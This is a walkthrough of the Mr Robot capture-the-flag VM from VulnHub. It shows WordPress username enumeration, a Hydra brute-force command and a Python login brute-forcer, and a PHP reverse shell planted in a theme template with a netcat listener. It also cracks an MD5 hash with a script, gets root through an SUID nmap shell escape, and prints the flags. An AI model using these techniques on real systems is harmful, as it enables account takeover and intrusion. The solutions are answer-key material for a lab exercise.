Mr Robot CTF

Available on Vulnhub

1. Enumeration

A quick port scan (nmap's default, which covers the top 1,000 TCP ports):

nmap 192.168.18.45

[Screenshot: nmap scan output]

Let's check out what's running on port 80:

[Screenshot: the website on port 80]

The site itself doesn't do much: it accepts a handful of commands, but none of them lead anywhere. Let's look around some more.

/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

OK, this looks interesting…

/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

Great, we have our first key, and we can download the dictionary file from /fsocity.dic.

[Screenshot: contents of fsocity.dic]

On closer inspection, fsocity.dic is 858160 lines long, messy and full of duplicates. We will probably need it for brute-force attacks, so let's remove the duplicates first.

sort fsocity.dic | uniq | wc -l
11451
sort -u fsocity.dic > fsocity.txt

Great, we have cut the wordlist by 846709 entries, from 858160 to 11451, so a brute-force run will need roughly 75 times fewer requests.

Let's look around some more and fire up dirb:

dirb http://192.168.18.45
/0

While dirb is still running, I check out /0 (the first hit) and find 'just another WordPress site', the default WordPress tagline.

OK, let's try the default WordPress login page at /wp-admin. It's there, so, having watched the series, let's try some obvious entries.

Username and password 'admin' returns an 'Invalid username' error, while username and password 'elliot' returns an 'incorrect password' error. WordPress's login form uses different messages for an unknown user and for a wrong password, so the error text itself confirms that 'elliot' is a valid account before a single successful login. Can we brute-force the password with our wordlist? First, let's proxy the login through Burp Suite to see exactly how the request is sent to the server.

POST /wp-login.php HTTP/1.1
Host: 192.168.18.45
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.18.45/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
Cookie: s_cc=true; s_fid=1CA6116ACDD798E8-1D577C92DEB71639; s_nr=1552942461209; s_sq=%5B%5BB%5D%5D; wordpress_test_cookie=WP+Cookie+check
Connection: close
Upgrade-Insecure-Requests: 1

log=elliot&pwd=hi&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.18.45%2Fwp-admin%2F&testcookie=1

 

2. Exploitation

Now we can fire up Hydra to brute-force the password, reusing the form fields from the captured request. The F= string is the failure marker: Hydra reports any response that does not contain 'is incorrect' as a hit, so the marker has to match the wrong-password message rather than the invalid-username one (against a non-existent user every attempt would look like a success).

hydra -vV -l elliot -P fsocity.txt 192.168.18.45 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

Wait a few minutes…

[80][http-post-form] host: 192.168.18.45   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
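The three pieces of this attack (deduplicating the wordlist, reading the login error as a username oracle, and the failure-string loop Hydra runs) fit in a short script, shown here as an added example that is not code from the original write-up. The transport is injected so the script runs offline against a constructed stand-in for WordPress; the helper names, the sample wordlist and the fake server are assumptions made for the example, and a live run would pass http_transport(TARGET) instead.

```python
"""Offline model of the wp-login.php attack: dedup the wordlist, use the
login error messages as a username oracle, then run the password loop the
way Hydra's http-post-form module does (a response lacking the failure
string is a hit).  Added example; the fake server and sample list are
constructed for it."""
from typing import Callable, Iterable, Optional
from urllib.parse import parse_qsl, urlencode

TARGET = "192.168.18.45"                      # the VM from the write-up
# Fragments of the messages WordPress puts in the login page on failure.
INVALID_USER = "Invalid username"             # username does not exist
WRONG_PASS = "is incorrect"                   # "...for the username X is incorrect."

# A transport takes the URL-encoded form body and returns (status, body, headers).
Transport = Callable[[str], tuple[int, str, dict]]


def dedupe_wordlist(lines: Iterable[str]) -> list[str]:
    """Order-preserving equivalent of `sort fsocity.dic | uniq`; drops blanks."""
    seen: set[str] = set()
    out: list[str] = []
    for line in lines:
        word = line.rstrip("\r\n")
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def login_form(user: str, password: str) -> str:
    """Same fields as the request captured in Burp."""
    return urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                      "redirect_to": f"http://{TARGET}/wp-admin/", "testcookie": "1"})


def classify(status: int, body: str, headers: dict) -> str:
    """Turn a wp-login.php response into the oracle the error text leaks."""
    if status in (301, 302) and "wp-admin" in headers.get("Location", ""):
        return "success"
    if INVALID_USER in body:
        return "bad-user"
    if WRONG_PASS in body:
        return "bad-pass"
    return "unknown"


def user_exists(user: str, send: Transport) -> bool:
    """One request with a junk password is enough to confirm a username."""
    return classify(*send(login_form(user, "hi"))) != "bad-user"


def brute_force(user: str, candidates: Iterable[str], send: Transport,
                failure: str = WRONG_PASS) -> Optional[str]:
    """Hydra-style loop keyed on a failure string (the write-up's F=is incorrect).

    Hydra would report the first attempt against a non-existent user as a hit,
    because 'Invalid username' does not contain the failure string; this loop
    checks the oracle first and stops instead of returning a false positive.
    """
    for password in candidates:
        status, body, headers = send(login_form(user, password))
        if classify(status, body, headers) == "bad-user":
            return None
        if failure not in body:
            return password
    return None


def http_transport(host: str, port: int = 80) -> Transport:
    """Real transport for a live target (not exercised offline)."""
    import http.client

    def send(form: str) -> tuple[int, str, dict]:
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.request("POST", "/wp-login.php", body=form, headers={
            "Content-Type": "application/x-www-form-urlencoded",
            # testcookie=1 makes WordPress insist this cookie is present.
            "Cookie": "wordpress_test_cookie=WP+Cookie+check",
        })
        resp = conn.getresponse()
        text = resp.read().decode("utf-8", "replace")
        conn.close()  # http.client does not follow redirects, so a 302 stays visible
        return resp.status, text, dict(resp.getheaders())
    return send


def fake_wordpress(valid_user: str = "elliot", valid_pass: str = "ER28-0652") -> Transport:
    """Constructed stand-in for the target that mimics WordPress 4.x responses."""
    def send(form: str) -> tuple[int, str, dict]:
        fields = dict(parse_qsl(form))
        if fields.get("log") != valid_user:
            return 200, "<div id='login_error'><strong>ERROR</strong>: Invalid username.</div>", {}
        if fields.get("pwd") != valid_pass:
            return 200, (f"<div id='login_error'><strong>ERROR</strong>: The password you "
                         f"entered for the username {valid_user} is incorrect.</div>"), {}
        return 302, "", {"Location": f"http://{TARGET}/wp-admin/"}
    return send


# Constructed sample of fsocity.dic: duplicates and a blank line, like the real file.
SAMPLE_DIC = ["elliot\n", "mrrobot\n", "\n", "elliot\n", "ER28-0652\n", "mrrobot\n"]

if __name__ == "__main__":
    send = fake_wordpress()  # swap for http_transport(TARGET) on a live run
    words = dedupe_wordlist(SAMPLE_DIC)
    print(len(SAMPLE_DIC), "->", len(words), "words")
    print("elliot exists:", user_exists("elliot", send), "| admin exists:", user_exists("admin", send))
    print("password:", brute_force("elliot", words, send))
```

The success check looks for the redirect to wp-admin rather than the absence of the failure string, which is what makes the loop robust against an unknown username; Hydra's single failure marker has no such second check, so always confirm the account exists before pointing it at a wordlist.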

Great, we're in the WordPress dashboard as elliot. To get a shell we will plant a PHP reverse shell in the theme's 404 template.

On the Kali machine I copy the contents of /usr/share/webshells/php/php-reverse-shell.php and paste it over the theme's 404 template in the WordPress theme editor, setting the $ip and $port values in the script to my own machine and port 444, where netcat will be listening.

[Screenshot: WordPress admin]

We hit save, which writes the PHP straight into the theme file on disk, and set up a netcat listener with nc -nlvp 444. We then open a new browser tab and request /404, a path that does not exist, so WordPress renders the 404 template and runs our payload.

[Screenshot: reverse shell connecting back to netcat]

Success, we have a shell. We upgrade it to a proper TTY with python -c 'import pty; pty.spawn("/bin/sh")'

Snooping around, in /home we find robot's home directory, containing a raw MD5 hash ‘c3fcd3d76192e4007dfb496cca67e13b’ and key-2-of-3.txt, which we do not have permission to read. A web search for the hash shows it is the MD5 of ‘abcdefghijklmnopqrstuvwxyz’ (it is the RFC 1321 test vector, which is why it is so widely indexed).
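Searching the web works only for hashes that happen to be indexed; the general technique is to hash each candidate and compare. The script below, an added example and not code from the original write-up, cracks the hash found in /home/robot against a candidate list constructed here (on the box you would stream fsocity.txt or a common wordlist through the same function), and refuses anything that is not a 32-character raw MD5 digest, since a prefixed or salted value needs a different mode.

```python
"""Wordlist crack of the raw MD5 from /home/robot.  Added example; the
candidate list is constructed for it."""
import hashlib
import re
from typing import Iterable, Optional

ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"   # hash quoted in the write-up
_MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def md5_hex(text: str) -> str:
    """Hex MD5 of a UTF-8 string, the 'raw-md5' format the file uses."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def looks_like_md5(digest: str) -> bool:
    """Raw MD5 is exactly 32 hex characters; anything else is another format."""
    return bool(_MD5_RE.match(digest.strip().lower()))


def crack_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 matches the digest, else None."""
    digest = digest.strip().lower()
    if not looks_like_md5(digest):
        raise ValueError(f"not a raw MD5 hex digest: {digest!r}")
    for candidate in candidates:
        word = candidate.rstrip("\r\n")      # wordlists arrive line by line
        if md5_hex(word) == digest:
            return word
    return None


# Constructed candidate list; the alphabet is the RFC 1321 test vector.
CANDIDATES = ["password", "robot", "fsociety", "ER28-0652",
              "abcdefghijklmnopqrstuvwxyz", "mrrobot"]

if __name__ == "__main__":
    print(crack_md5(ROBOT_HASH, CANDIDATES))
```

For anything larger than a toy list, hand the same hash to hashcat -m 0 (raw MD5) or john --format=raw-md5; the logic is identical, just optimised.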

We now su robot with the recovered password. Success! We can now cat key-2-of-3.txt, revealing the second flag ‘822c73956184f694993bede3eb39f959’.

3. Escalation

Time to get root. Looking around, I decide to start with files that have the SUID bit set, since any of them runs with its owner's privileges regardless of who invokes it.

find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

nmap, SUID root and in /usr/local/bin? That's unusual, let's see which version.

nmap -v

Starting nmap 3.81 

A quick Google of 'nmap 3.81 priv esc' shows that this old version has an --interactive mode that lets you escape to a shell with the ! prefix; because the binary is SUID root, that shell inherits an effective uid of 0. (The option has since been removed from Nmap.)

*If nmap were run via sudo instead, id would report uid=0 outright; here the real uid stays 1002 and only the effective uid is root, which is still enough to read /root.

nmap --interactive
nmap> !sh
#id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
cd /root
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Pwned 😀